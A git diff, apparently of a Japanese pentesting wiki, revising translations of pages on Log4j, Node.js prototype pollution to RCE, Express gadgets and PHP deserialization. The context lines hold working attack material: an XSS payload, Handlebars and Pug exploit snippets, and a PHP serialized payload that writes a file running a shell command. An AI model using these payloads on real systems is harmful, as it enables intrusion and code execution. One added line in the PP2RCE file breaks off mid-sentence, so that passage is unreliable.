+_この攻撃はカスタム生成されたJavaオブジェクトを使用しており、**THMソーラールーム**のようなラボで機能します。しかし、一般的には機能しません（デフォルトではJavaはLDAPを使用してリモートコードベースをロードするように構成されていないため）これは、信頼されたクラスを悪用して任意のコードを実行していないからだと思います。_
 
 ### RCE - JNDI-Injection-Exploit-Plus
 
@@ -373,7 +373,7 @@ CTFでは、log4Jを使用してJavaアプリケーションの**stderrにアク
 
 ### 変換パターンの例外
 
-念のために言及すると、[**変換パターン**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) を新たに注入し、`stdout` にログされる例外をトリガーすることも可能です。例えば：
+念のために言及すると、新しい [**変換パターン**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) を注入し、`stdout` に記録される例外をトリガーすることもできます。例えば：
 
 ![](<../../images/image (683).png>)
 
@@ -381,7 +381,7 @@ CTFでは、log4Jを使用してJavaアプリケーションの**stderrにアク
 
 ### 変換パターンの正規表現
 
-ただし、**正規表現をサポートするいくつかの変換パターン**を使用して、正規表現を利用し、**二分探索**または**時間ベース**の動作を悪用して情報を抽出することが可能です。
+ただし、**正規表現をサポートするいくつかの変換パターン**を使用して、正規表現を使用し、**二分探索**または**時間ベース**の動作を悪用して、検索から情報を抽出することが可能です。
 
 - **例外メッセージによる二分探索**
 
@@ -416,9 +416,9 @@ CTFでは、log4Jを使用してJavaアプリケーションの**stderrにアク
 > }{#}{######################################################}
 > ```
 >
-> フラグが`flagGuess`で始まる場合、全体のフラグは29個の`#`に置き換えられます（この文字を使用したのは、フラグの一部でない可能性が高いためです）。**結果として得られる29個の`#`は54個の`#`に置き換えられます**。このプロセスは**6回**繰り返され、合計で` 29*54*54^6* =`` `` `**`96816014208`** **`#`になります！**
+> フラグが`flagGuess`で始まる場合、全体のフラグは29個の`#`に置き換えられます（この文字を使用したのは、フラグの一部でない可能性が高いためです）。**結果として得られた29個の`#`は54個の`#`に置き換えられます**。このプロセスは**6回**繰り返され、合計で` 29*54*54^6* =`` `` `**`96816014208`** **`#`が生成されます！**
 >
-> これほど多くの`#`を置き換えると、Flaskアプリケーションの10秒のタイムアウトが発生し、その結果、HTTPステータスコード500がユーザーに送信されます。（フラグが`flagGuess`で始まらない場合、500以外のステータスコードを受け取ります）
+> これほど多くの`#`を置き換えると、Flaskアプリケーションの10秒のタイムアウトが発生し、その結果、HTTPステータスコード500がユーザーに送信されます。（フラグが`flagGuess`で始まらない場合、500以外のステータスコードが返されます）
 
 ## 参考文献
 
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
index 040fef2f1..648b76bbd 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
@@ -78,7 +78,7 @@ console.log(car1.isVehicle) // Outputs true
 ```
 ## プロトタイプ汚染
 
-`__proto__` の使用が制限されているシナリオでは、関数のプロトタイプを変更することが代替手段です:
+`__proto__` の使用が制限されているシナリオでは、関数のプロトタイプを変更することが代替手段です：
 ```javascript
 function Vehicle(model) {
 this.model = model
@@ -185,7 +185,7 @@ user.isAdmin // true
 ```
 このメカニズムは、攻撃者が特定の入力を制御できる場合、アプリケーション内のすべてのオブジェクトのプロトタイプを変更できるようにプロパティを操作することに関係しています。この操作は通常、`__proto__`プロパティを設定することを含み、JavaScriptではオブジェクトのプロトタイプを直接変更することと同義です。
 
-この攻撃が成功裏に実行される条件は、特定の[研究](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)に概説されており、以下が含まれます：
+この攻撃が成功裏に実行される条件は、特定の[研究](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)に概説されているように、以下を含みます：
 
 - 再帰的マージを実行すること。
 - パスに基づいてプロパティを定義すること。
@@ -218,7 +218,7 @@ client-side-prototype-pollution.md
 $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
 console.log({}.devMode) // Outputs: true
 ```
-この脆弱性はCVE-2019–11358として特定されており、ディープコピーがプロトタイプを意図せずに変更する方法を示しています。これにより、`isAdmin`のようなプロパティが適切な存在確認なしにチェックされると、未承認の管理者アクセスなどの潜在的なセキュリティリスクが生じる可能性があります。
+この脆弱性はCVE-2019–11358として特定されており、ディープコピーがプロトタイプを意図せず変更する方法を示しています。これにより、`isAdmin`のようなプロパティが適切な存在確認なしにチェックされると、未承認の管理者アクセスなどの潜在的なセキュリティリスクが生じる可能性があります。
 
 ### CVE-2018–3721、CVE-2019–10744: lodashによるプロトタイプ汚染攻撃
 
@@ -237,7 +237,7 @@ console.log({}.devMode) // Outputs: true
 
 ### NodeJSにおけるASTプロトタイプ汚染
 
-NodeJSは、テンプレートエンジンやTypeScriptなどの機能のためにJavaScriptで抽象構文木（AST）を広範に利用しています。このセクションでは、テンプレートエンジン、特にHandlebarsとPugにおけるプロトタイプ汚染に関連する脆弱性を探ります。
+NodeJSは、テンプレートエンジンやTypeScriptなどの機能のためにJavaScriptで抽象構文木（AST）を広範に利用しています。このセクションでは、テンプレートエンジン、特にHandlebarsとPugに関連するプロトタイプ汚染の脆弱性を探ります。
 
 #### Handlebars脆弱性分析
 
@@ -251,7 +251,7 @@ Handlebarsテンプレートエンジンは、プロトタイプ汚染攻撃に
 2. **コンパイラによる処理**: コンパイラはASTオブジェクトまたは文字列テンプレートを処理できます。`input.type`が`Program`に等しい場合、入力は事前に解析されたものとして扱われ、これを悪用できます。
 3. **コードの注入**: `Object.prototype`を操作することで、テンプレート関数に任意のコードを注入でき、リモートコード実行につながる可能性があります。
 
-Handlebarsの脆弱性を悪用する例を示します：
+Handlebarsの脆弱性を悪用する例：
 ```javascript
 const Handlebars = require("handlebars")
 
@@ -285,7 +285,7 @@ console.log(eval("(" + template + ")")["main"].toString())
 
 **外部参照**: [「flat」ライブラリにおけるプロトタイプ汚染に関連する問題](https://github.com/hughsk/flat/issues/105)
 
-Pythonにおけるプロトタイプ汚染の悪用の例:
+Pythonにおけるプロトタイプ汚染のエクスプロイトの例:
 ```python
 import requests
 
@@ -313,7 +313,7 @@ requests.get(TARGET_URL)
 ```
 #### Pugの脆弱性
 
-Pug、別のテンプレートエンジンも、プロトタイプ汚染の同様のリスクに直面しています。詳細情報は、[PugにおけるASTインジェクション](https://blog.p6.is/AST-Injection/#Pug)の議論で入手できます。
+Pugは、別のテンプレートエンジンであり、プロトタイプ汚染の同様のリスクに直面しています。詳細な情報は、[PugにおけるASTインジェクション](https://blog.p6.is/AST-Injection/#Pug)の議論で入手できます。
 
 Pugにおけるプロトタイプ汚染の例:
 ```python
@@ -336,14 +336,14 @@ requests.get(TARGET_URL)
 
 プロトタイプ汚染のリスクを減らすために、以下の戦略を採用できます：
 
-1. **オブジェクトの不変性**: `Object.prototype`を`Object.freeze`を適用することで不変にできます。
+1. **オブジェクトの不変性**: `Object.prototype`は`Object.freeze`を適用することで不変にできます。
 2. **入力検証**: JSON入力はアプリケーションのスキーマに対して厳密に検証する必要があります。
 3. **安全なマージ関数**: 再帰的なマージ関数の安全でない使用は避けるべきです。
 4. **プロトタイプのないオブジェクト**: プロトタイププロパティのないオブジェクトは`Object.create(null)`を使用して作成できます。
 5. **Mapの使用**: キーと値のペアを保存するために`Object`の代わりに`Map`を使用すべきです。
 6. **ライブラリの更新**: 定期的にライブラリを更新することでセキュリティパッチを組み込むことができます。
 7. **リンターと静的解析ツール**: プロトタイプ汚染の脆弱性を検出し防止するために、適切なプラグインを持つESLintのようなツールを使用します。
-8. **コードレビュー**: プロトタイプ汚染に関連する潜在的なリスクを特定し修正するために徹底的なコードレビューを実施します。
+8. **コードレビュー**: プロトタイプ汚染に関連する潜在的なリスクを特定し修正するために、徹底的なコードレビューを実施します。
 9. **セキュリティトレーニング**: 開発者にプロトタイプ汚染のリスクと安全なコードを書くためのベストプラクティスについて教育します。
 10. **ライブラリの使用に注意**: サードパーティのライブラリを使用する際は注意が必要です。特にオブジェクトを操作するものについては、そのセキュリティ姿勢を評価し、コードをレビューします。
 11. **ランタイム保護**: プロトタイプ汚染攻撃を検出し防止できるセキュリティ重視のnpmパッケージを使用するなど、ランタイム保護メカニズムを採用します。
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index d499c3113..dc5bdd313 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -6,7 +6,7 @@
 
 ツール [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)**,** [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **および** [**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find) は **プロトタイプ汚染の脆弱性を見つける**ために使用できます。
 
-さらに、**ブラウザ拡張機能** [**PPScan**](https://github.com/msrkp/PPScan) を使用して、**自動的に** **アクセスする** **ページ**のプロトタイプ汚染の脆弱性を**スキャン**することもできます。
+さらに、**ブラウザ拡張機能** [**PPScan**](https://github.com/msrkp/PPScan) を使用して、**アクセス**した**ページ**を**自動的に** **スキャン**し、プロトタイプ汚染の脆弱性を探すこともできます。
 
 ### プロパティが使用されている場所のデバッグ <a href="#id-5530" id="id-5530"></a>
 ```javascript
@@ -19,7 +19,7 @@ return "test"
 },
 })
 ```
-### Prototype Pollutionの根本原因を特定する <a href="#id-5530" id="id-5530"></a>
+### プロトタイプ汚染の根本原因を特定する <a href="#id-5530" id="id-5530"></a>
 
 プロトタイプ汚染の脆弱性がツールによって特定され、コードがそれほど複雑でない場合、Chrome Developer Toolsで`location.hash`、`decodeURIComponent`、または`location.search`などのキーワードを検索することで脆弱性を見つけることができます。このアプローチにより、JavaScriptコードの脆弱なセクションを特定できます。
 
@@ -48,7 +48,7 @@ debugAccess(Object.prototype, "ppmap")
 ```
 4. **Sources** タブに戻り、「スクリプトの実行を再開」を選択します。JavaScript は引き続き実行され、'ppmap' プロパティは予想通りに汚染されます。提供されたスニペットを利用することで、'ppmap' プロパティが汚染される正確な場所を特定できます。**Call Stack** を調べることで、汚染が発生した異なるスタックを観察できます。
 
-どのスタックを調査するかを決定する際には、JavaScript ライブラリファイルに関連するスタックをターゲットにすることがしばしば有用です。プロトタイプ汚染はこれらのライブラリ内で頻繁に発生します。ライブラリファイルへの関連付けを調べることで、関連するスタックを特定します（右側に表示され、ガイダンス用の画像に似ています）。行 4 と 6 のように複数のスタックがある場合、論理的な選択は行 4 のスタックです。これは汚染の最初の発生を示し、脆弱性の根本原因を表します。スタックをクリックすると、脆弱なコードに移動します。
+どのスタックを調査するかを決定する際、JavaScript ライブラリファイルに関連するスタックをターゲットにすることがしばしば有用です。プロトタイプ汚染はこれらのライブラリ内で頻繁に発生します。ライブラリファイルへの関連付けを調べることで、関連するスタックを特定します（右側に表示され、ガイダンス用の画像に似ています）。行 4 と 6 のように複数のスタックがある場合、論理的な選択は行 4 のスタックです。これは汚染の最初の発生を示し、脆弱性の根本原因を表します。スタックをクリックすると、脆弱なコードに移動します。
 
 ![https://miro.medium.com/max/1400/1*S8NBOl1a7f1zhJxlh-6g4w.jpeg](https://miro.medium.com/max/1400/1*S8NBOl1a7f1zhJxlh-6g4w.jpeg)
 
@@ -56,7 +56,7 @@ debugAccess(Object.prototype, "ppmap")
 
 ガジェットは、**PP 脆弱性が発見されたときに悪用されるコード**です。
 
-アプリケーションがシンプルな場合、**`srcdoc/innerHTML/iframe/createElement`** のような **キーワード** を **検索** し、ソースコードをレビューして **JavaScript 実行につながるか** を確認できます。時には、言及された技術がガジェットを全く見つけられないこともあります。その場合、純粋なソースコードレビューが、以下の例のような素晴らしいガジェットを明らかにします。
+アプリケーションがシンプルな場合、**`srcdoc/innerHTML/iframe/createElement`** のような **キーワード** を **検索** し、ソースコードをレビューして **JavaScript 実行に繋がるか** を確認できます。時には、言及された技術がガジェットを全く見つけられないこともあります。その場合、純粋なソースコードレビューが、以下の例のような素晴らしいガジェットを明らかにします。
 
 ### Mithil ライブラリコードでの PP ガジェットの発見例
 
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
index bd24e00da..10c08c4a2 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@@ -1,14 +1,14 @@
-# Express プロトタイプ汚染ガジェット
+# Expressプロトタイプ汚染ガジェット
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## XSS レスポンスを提供する
+## XSSレスポンスを提供する
 
 **詳細については** [**元の研究を参照してください**](https://portswigger.net/research/server-side-prototype-pollution)
 
-### JSON コンテンツタイプを HTML に変更する
+### JSONコンテンツタイプをHTMLに変更する
 
-Express アプリで **JSON コンテンツタイプレスポンス** を使用し、JSON を反映させる：
+Expressアプリで**JSONコンテンツタイプのレスポンス**を使用し、JSONを反映させる：
 ```javascript
 app.use(bodyParser.json({ type: "application/json" }))
 app.post("/", function (req, res) {
@@ -20,11 +20,11 @@ res.send(req.body)
 ```json
 { "__proto__": { "_body": true, "body": "<script>evil()" } }
 ```
-**`body`** と **`_body`** プロパティを **汚染する** ことによって、**ExpressがHTMLコンテンツタイプを提供し、** `_body` プロパティを反映させることが可能になり、結果として保存されたXSSが発生します。
+**`body`** と **`_body`** プロパティを **汚染** することで、**ExpressがHTMLコンテンツタイプを提供し、** `_body` プロパティを反映させることが可能になり、保存されたXSSが発生します。
 
-### UTF7をレンダリングする
+### UTF7をレンダリング
 
-Expressが **UTF-7コンテンツをレンダリングする** ことを可能にする方法があります:
+Expressが **UTF-7コンテンツをレンダリングする** ことが可能です:
 ```json
 { "__proto__": { "content-type": "application/json; charset=utf-7" } }
 ```
@@ -67,20 +67,20 @@ Expressが **UTF-7コンテンツをレンダリングする** ことを可能
 ```
 ### エラー
 
-プリミティブ（文字列など）をプロトタイプに割り当てると、**プロトタイプはオブジェクトでなければならないため、何も行わない操作が生成されます**。`Object.prototype`自体にプロトタイプオブジェクトを割り当てようとすると、**例外がスローされます**。これらの2つの動作を使用して、**プロトタイプ汚染が成功したかどうかを検出できます**：
+プリミティブ（例えば文字列）を使ってプロトタイプに割り当てると、**プロトタイプはオブジェクトでなければならないため、何も行わない操作が生成されます**。`Object.prototype`自体にプロトタイプオブジェクトを割り当てようとすると、**例外がスローされます**。これらの2つの動作を使用して、**プロトタイプ汚染が成功したかどうかを検出できます**：
 ```javascript
 ;({}).__proto__.__proto__ = {}(
 //throws type exception
 {}
 ).__proto__.__proto__ = "x" //no-op does not throw exception
 ```
-### 反射された値
+### 反射値
 
-アプリケーションが応答にオブジェクトを含めるとき、`__proto__` と一緒に **異常な名前の属性を作成すること** は洞察を与える可能性があります。特に、**応答に異常な属性のみが返される場合**、これはアプリケーションの脆弱性を示している可能性があります：
+アプリケーションがレスポンスにオブジェクトを含めるとき、**`__proto__`**と一緒に**異常な名前の属性を作成すること**は洞察を与える可能性があります。特に、**異常な属性のみがレスポンスに返される**場合、これはアプリケーションの脆弱性を示している可能性があります：
 ```json
 { "unusualName": "value", "__proto__": "test" }
 ```
-さらに、Lodashのようなライブラリが使用されるシナリオでは、プロトタイプ汚染（PP）を介しておよびオブジェクト内で直接プロパティを設定することが、別の診断アプローチを提供します。そのようなプロパティがレスポンスから省略されている場合、それはLodashがマージする前にターゲットオブジェクト内のプロパティの存在を確認していることを示唆しています。
+さらに、Lodashのようなライブラリが使用されるシナリオでは、プロトタイプ汚染（PP）を介しておよびオブジェクト内で直接プロパティを設定することが、別の診断アプローチを提供します。そのようなプロパティがレスポンスから省略されている場合、Lodashがマージする前にターゲットオブジェクト内のプロパティの存在を確認していることを示唆しています。
 ```javascript
 {"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
 // If 'b' is the only property reflected, this indicates prototype pollution in Lodash
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
index 9356f166c..02f3aa8e7 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@@ -1,10 +1,10 @@
-# プロトタイプ汚染からRCEへ
+# Prototype Pollution to RCE
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## 脆弱なコード
+## Vulnerable Code
 
-実際のJSが以下のようなコードを使用していると想像してみてください:
+実際のJSが次のようなコードを使用していると想像してください:
 ```javascript
 const { execSync, fork } = require("child_process")
 
@@ -41,7 +41,7 @@ var proc = fork("a_file.js")
 
 **PP2RCE**は**Prototype Pollution to RCE**（リモートコード実行）を意味します。
 
-この[**writeup**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)によると、**`child_process`**のいくつかのメソッド（`fork`や`spawn`など）を使用して**プロセスが生成される**と、`normalizeSpawnArguments`メソッドが呼び出され、これは**新しいenv varsを作成するためのプロトタイプ汚染ガジェット**です：
+この[**writeup**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)によると、**process is spawned**が**`child_process`**のいくつかのメソッド（`fork`や`spawn`など）を使用して呼び出されると、**prototype pollution gadget to create new env vars**である`normalizeSpawnArguments`メソッドが呼び出されます：
 ```javascript
 //See code in https://github.com/nodejs/node/blob/02aa8c22c26220e16616a88370d111c0229efe5e/lib/child_process.js#L638-L686
 
@@ -61,17 +61,13 @@ ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
 }
 }
 ```
-コードを確認してください。**`envPairs`**を**汚染**することが可能であることがわかります。**属性`.env`**によってです。
+コードを確認してください。**`envPairs`**を**汚染**することが可能であることがわかります。**属性`.env`**を通じてです。
 
 ### **`__proto__`の汚染**
 
 > [!WARNING]
 > **`child_process`**ライブラリの**`normalizeSpawnArguments`**関数の動作により、プロセスのために**新しいenv変数を設定する**ために何かを呼び出すとき、**何かを汚染する**だけで済みます。\
-> 例えば、`__proto__.avar="valuevar"`を実行すると、プロセスは`avar`という名前の変数を`valuevar`という値で生成します。
->
-> しかし、**env変数が最初のものであるためには**、**`.env`属性を汚染する**必要があり、（一部のメソッドのみで）その変数が**最初のもの**になります（攻撃を可能にします）。
->
-> だからこそ、次の攻撃では**`NODE_OPTIONS`**が**`.env`の中にない**のです。
+> 例えば、`__proto__.avar="
 ```javascript
 const { execSync, fork } = require("child_process")
 
@@ -149,9 +145,9 @@ clone(USERINPUT)
 var proc = fork("a_file.js")
 // This should create the file /tmp/pp2rec
 ```
-## DNSインタラクション
+## DNS Interaction
 
-以下のペイロードを使用することで、以前に説明したNODE_OPTIONS環境変数を悪用し、DNSインタラクションで機能したかどうかを検出することが可能です：
+以下のペイロードを使用することで、以前に説明したNODE_OPTIONS環境変数を悪用し、DNSインタラクションを通じてそれが機能したかどうかを検出することが可能です：
 ```json
 {
 "__proto__": {
@@ -227,16 +223,16 @@ var proc = execFile("/usr/bin/node")
 
 // Windows - not working
 ```
-**`execFile`**が機能するためには、**NODE_OPTIONS**が機能するように**node**を**実行する必要があります**。\
-もし**node**を実行していない場合は、実行しているものの**実行を変更する方法**を見つけ、環境変数を設定する必要があります。
+**`execFile`** が機能するためには、**NODE_OPTIONS** が機能するように **node** を実行する必要があります。\
+もし **node** を実行していない場合は、実行されているものの **実行を変更する** 方法を見つけ、環境変数を設定する必要があります。
 
-**他の**技術はこの要件なしで**機能します**。なぜなら、プロトタイプ汚染を通じて**実行されるものを変更することが可能だからです**。（この場合、たとえ`.shell`を汚染できても、実行されているものは汚染できません）。
+**他の** テクニックはこの要件なしで **機能** します。なぜなら、プロトタイプ汚染を通じて **実行されるものを変更する** ことが **可能だからです**。 （この場合、たとえ `.shell` を汚染できても、実行されているものは汚染できません）。
 
 </details>
 
 <details>
 
-<summary><code>fork</code>の悪用</summary>
+<summary><code>fork</code> の悪用</summary>
 ```javascript
 // environ trick - working
 // Working after kEmptyObject (fix)
@@ -468,7 +464,7 @@ var proc = spawnSync("something")
 ### requireファイルパスの制御
 
 この [**別の書き込み**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) では、ユーザーが **`require`** が実行されるファイルパスを制御できます。そのシナリオでは、攻撃者は **インポートされたときにスポーンメソッドを実行する `.js` ファイルをシステム内で見つける** 必要があります。\
-インポートされたときにスポーン関数を呼び出す一般的なファイルの例は次のとおりです：
+インポートされたときにスポーン関数を呼び出す一般的なファイルのいくつかの例は次のとおりです：
 
 - /path/to/npm/scripts/changelog.js
 - /opt/yarn-v1.22.19/preinstall.js
@@ -497,23 +493,23 @@ done
 
 </details>
 
-### プロトタイプ汚染によるrequireファイルパスの設定
+### プロトタイプ汚染を介したrequireファイルパスの設定
 
 > [!WARNING]
-> **前の技術は**、**ユーザーがファイルのパスを制御する必要がある**ことを要求します。 しかし、これは常に真ではありません。
+> **以前の技術は**、**ユーザーがファイルのパスを制御する必要がある**ことを要求します。 しかし、これは常に真ではありません。
 
 ただし、プロトタイプ汚染の後にrequireを実行するコードがある場合、たとえ**パスを制御できなくても**、**プロトタイプ汚染を悪用して異なるパスを強制することができます**。 したがって、コード行が`require("./a_file.js")`や`require("bytes")`のようであっても、汚染したパッケージを**require**します。
 
-したがって、プロトタイプ汚染の後にrequireが実行され、spawn関数がない場合、これが攻撃です：
+したがって、プロトタイプ汚染の後にrequireが実行され、spawn関数がない場合、これは攻撃です：
 
 - **システム内の`.js`ファイルを見つける** それが**require**されると、`child_process`を使用して**何かを実行します**
 - 攻撃しているプラットフォームにファイルをアップロードできる場合、そのようなファイルをアップロードすることができます
-- **パスを汚染して、`.js`ファイルのrequireロードを強制する**
-- **環境/コマンドラインを汚染して、child_process実行関数が呼び出されたときに任意のコードを実行する**（最初の技術を参照）
+- パスを汚染して、**`.js`ファイルのrequireロードを強制する** それがchild_processで何かを実行します
+- **環境/コマンドラインを汚染して**、child_process実行関数が呼び出されたときに任意のコードを実行します（最初の技術を参照）
 
 #### 絶対require
 
-実行されるrequireが**絶対的**（`require("bytes")`）で、**パッケージが`package.json`ファイルにmainを含まない場合**、**`main`属性を汚染して、**requireが異なるファイルを実行するようにすることができます。
+実行されたrequireが**絶対的**（`require("bytes")`）で、**パッケージが`package.json`ファイルにmainを含まない場合**、**`main`属性を汚染して**、**requireが異なるファイルを実行するようにすることができます**。
 
 {{#tabs}}
 {{#tab name="exploit"}}
@@ -556,7 +552,7 @@ fork("anything")
 
 #### 相対require - 1
 
-**相対パス**が絶対パスの代わりに読み込まれる場合、nodeに**異なるパスを読み込ませる**ことができます：
+もし**相対パス**が絶対パスの代わりに読み込まれると、nodeは**異なるパスを読み込む**ことができます：
 
 {{#tabs}}
 {{#tab name="exploit"}}
@@ -660,15 +656,15 @@ require("./usage.js")
 ```
 ## VM Gadgets
 
-論文[https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)では、**`vm`**ライブラリのいくつかのメソッドからの**`contextExtensions`**の制御がガジェットとして使用できることが示されています。\
-しかし、前述の**`child_process`**メソッドと同様に、最新バージョンでは**修正**されています。
+論文[https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)では、**`vm`**ライブラリのいくつかのメソッドからの**`contextExtensions`**の制御がガジェットとして使用できることも示されています。\
+しかし、前述の**`child_process`**メソッドと同様に、最新のバージョンでは**修正**されています。
 
 ## Fixes & Unexpected protections
 
 プロトタイプ汚染は、アクセスされているオブジェクトの**属性**が**未定義**である場合に機能することに注意してください。**コード**内でその**属性**に**値**が**設定**されている場合、**上書きすることはできません**。
 
-2022年6月、[**このコミット**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a)から、変数`options`は`{}`の代わりに**`kEmptyObject`**です。これにより、プロトタイプ汚染が**`options`**の**属性**に影響を与えてRCEを取得することを**防ぎます**。\
-少なくともv18.4.0からこの保護が**実装されており、**そのため`spawn`および`spawnSync`の**エクスプロイト**はメソッドに影響を与えなくなりました（`options`が使用されていない場合！）。
+2022年6月、[**このコミット**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a)から、変数`options`は`{}`の代わりに**`kEmptyObject`**です。これにより、プロトタイプ汚染が**`options`**の**属性**に影響を与えてRCEを取得するのを防ぎます。\
+少なくともv18.4.0からこの保護が**実装**されており、したがって`spawn`および`spawnSync`の**エクスプロイト**はメソッドに影響を与えなくなりました（`options`が使用されていない場合！）。
 
 [**このコミット**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9)では、vmライブラリの**`contextExtensions`**の**プロトタイプ汚染**が、**`{}`**の代わりに**`kEmptyObject`**に設定されることで**ある程度修正**されました。
 
diff --git a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
index cc57ed43c..6cb64f328 100644
--- a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
+++ b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
@@ -6,14 +6,14 @@
 
 ## PHP デシリアライズ + spl_autoload_register + LFI/Gadget
 
-私たちは、**`phpggc`**内に脆弱なガジェットを持たない**ウェブアプリでのPHPデシリアライズ**を見つけた状況にいます。しかし、同じコンテナ内には**脆弱なライブラリを持つ別のコンポーザーウェブアプリ**がありました。したがって、目標は**別のウェブアプリのコンポーザーローダーをロードし**、それを悪用して**デシリアライズに脆弱なウェブアプリのライブラリをガジェットで攻撃すること**でした。
+私たちは、**`phpggc`** 内に脆弱なガジェットを持たない **ウェブアプリのPHPデシリアライズ** を見つけた状況にいます。しかし、同じコンテナ内には **脆弱なライブラリを持つ別のコンポーザーウェブアプリ** がありました。したがって、目標は **別のウェブアプリのコンポーザーローダーをロードし**、それを悪用して **デシリアライズに脆弱なウェブアプリのガジェットを使用してそのライブラリを攻撃すること** でした。
 
 手順：
 
-- **デシリアライズ**を見つけ、現在のアプリコードには**ガジェットが存在しない**
-- 次のような**`spl_autoload_register`**関数を悪用して、**`.php`拡張子のローカルファイルをロードする**
-- そのために、クラス名が**`$name`**内に入るデシリアライズを使用します。シリアライズされたオブジェクトのクラス名には**"/"や"."**を使用できませんが、**コード**は**アンダースコア**("\_")を**スラッシュ**("/")に**置き換えています**。したがって、`tmp_passwd`のようなクラス名は`/tmp/passwd.php`に変換され、コードはそれをロードしようとします。\
-**ガジェットの例**は次のようになります：**`O:10:"tmp_passwd":0:{}`**
+- **デシリアライズ** を見つけ、現在のアプリコードには **ガジェットが存在しない**
+- 次のような **`spl_autoload_register`** 関数を悪用して **`.php` 拡張子のローカルファイルをロードする**
+- そのために、クラス名が **`$name`** 内に入るデシリアライズを使用します。シリアライズされたオブジェクトのクラス名には **"/" または "."** を使用できませんが、**コード** は **アンダースコア** ("\_") を **スラッシュ** ("/") に **置き換えています**。したがって、`tmp_passwd` のようなクラス名は `/tmp/passwd.php` に変換され、コードはそれをロードしようとします。\
+**ガジェットの例** は次のようになります： **`O:10:"tmp_passwd":0:{}`**
 ```php
 spl_autoload_register(function ($name) {
 
@@ -43,22 +43,22 @@ require __DIR__ . $filename;
 - この別のライブラリを読み込むには、まず**その別のウェブアプリのComposerローダーを読み込む必要があります**（現在のアプリケーションのものでは他のライブラリにアクセスできません）。**アプリケーションのパスを知っていれば**、次のように非常に簡単に実現できます：**`O:28:"www_frontend_vendor_autoload":0:{}`**（私の場合、Composerローダーは`/www/frontend/vendor/autoload.php`にありました）
 - さて、他の**アプリのComposerローダーを読み込む**ことができるので、**使用するための`phpgcc`** **ペイロードを生成する**時です。私の場合、**`Guzzle/FW1`**を使用し、これにより**ファイルシステム内の任意のファイルを書き込む**ことができました。
 - 注：**生成されたガジェットは機能しませんでした**。機能させるために、**`chain.php`**のphpggcペイロードを**修正**し、クラスの**すべての属性**を**privateからpublicに**設定しました。そうしないと、文字列をデシリアライズした後、作成されたオブジェクトの属性には値がありませんでした。
-- これで、**他のアプリのComposerローダーを読み込む方法**があり、**機能するphpggcペイロード**も手に入れましたが、**ガジェットが使用されるときにローダーが読み込まれるためには、同じリクエストでこれを行う必要があります**。そのため、次のように両方のオブジェクトを含むシリアライズされた配列を送信しました：
-- **最初にローダーが読み込まれ、その後にペイロードが表示される**のがわかります。
+- これで、**他のアプリのComposerローダーを読み込む方法**があり、**機能するphpggcペイロード**もありますが、**ガジェットが使用されるときにローダーが読み込まれるためには、同じリクエスト内でこれを行う必要があります**。そのため、次のように両方のオブジェクトを含むシリアライズされた配列を送信しました：
+- **最初にローダーが読み込まれ、その後ペイロードが表示される**のがわかります。
 ```php
 a:2:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}}
